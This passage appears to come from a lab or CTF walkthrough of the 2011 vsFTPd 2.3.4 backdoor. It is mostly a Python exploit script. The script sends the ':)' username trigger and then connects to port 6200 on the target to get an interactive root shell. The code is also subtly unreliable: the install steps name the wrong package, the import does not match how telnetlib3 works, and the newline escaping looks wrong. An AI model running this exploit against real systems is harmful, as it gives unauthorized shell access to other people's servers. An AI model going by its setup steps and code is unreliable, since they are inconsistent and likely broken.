This one is super fun. Realistically, given a CVE like this, especially considering it is dated 2011, you are looking for a PoC (Proof of Concept) exploit script that someone else has created.
ExploitDB is going to have something pretty close to what you see below:
- Note: The library
telnetlib may need to be replaced by telnetlib3
python3 -m venv venv
source venv/bin/activate
pip3 install telnetlib2
# You may need to install telnetlib and change the import below if you are using an older version of Python
<https://www.exploit-db.com/exploits/49757>
#!/usr/bin/python3
from telnetlib3 import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)
signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
parser.add_argument("--port", help="input the port of the vulnerable host", type=int, default=21)
args = parser.parse_args()
host = args.host
portFTP = args.port
user="USER nergal:)"
password="PASS pass"
print(f"Connecting to {host}:{portFTP}")
tn=Telnet(host, portFTP)
try:
tn.read_until(b"(vsFTPd 2.3.4)", timeout=5)
except:
pass # Continue anyway mostly
tn.write(user.encode('ascii') + b"\\n")
try:
tn.read_until(b"password.", timeout=5)
except:
pass
tn.write(password.encode('ascii') + b"\\n")
# Connect to backdoor port
print("Attempting to connect to backdoor on port 6200...")
try:
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `CTRL-C` to quit shell')
tn2.interact()
except Exception as e:
print(f"Failed to connect to backdoor: {e}")